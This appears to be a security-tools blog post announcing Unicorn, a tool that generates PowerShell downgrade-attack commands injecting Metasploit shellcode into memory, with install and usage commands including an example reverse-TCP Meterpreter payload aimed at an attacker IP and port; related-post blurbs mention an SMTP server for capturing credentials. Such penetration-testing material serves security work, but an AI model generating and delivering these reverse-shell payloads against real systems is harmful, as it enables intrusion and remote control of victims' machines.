Unicorn

Published by root on

Unicorn

PowerShell downgrade attack

 

Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber’s PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

Usage is simple, just run Magic Unicorn (ensure Metasploit is installed and in the right path) and magic unicorn will automatically generate a PowerShell command that you need to simply cut and paste the PowerShell code into a command line window or through a payload delivery system.

Download

git clone https://github.com/trustedsec/unicorn.git
python unicorn.py

 Usage

python unicorn.py payload reverse_ipaddr port
Example:
python unicorn.py windows/meterpreter/reverse_tcp 192.168.0.105 1337

Loading

Categories: Tools
Tags:

Related Posts

Tools Category
Tools

PuTTY 0.71 Released

SSH Client Updated To Fix a Large Number of Security Vulnerabilities The free and open-source SSH client updated with the fix for a number of Security Vulnerabilities including the one in RSA key exchange and Read more…

Tools Category
Tools

MITMsmtp v0.0.2 released

Evil SMTP Server for pentesting SMTP clients MITMsmtp MITMsmtp is an Evil SMTP Server for pentesting SMTP clients to catch login credentials and mails sent over plain or SSL/TLS encrypted connections. The idea is to Read more…

Tools Category
Tools

conjur v1.4.0 releases

Secures secrets used by privileged users and machine identities Conjur provides secrets management and machine identity for modern infrastructure: Machine Authorization Markup Language (“MAML”), a role-based access policy language to define system components & their Read more…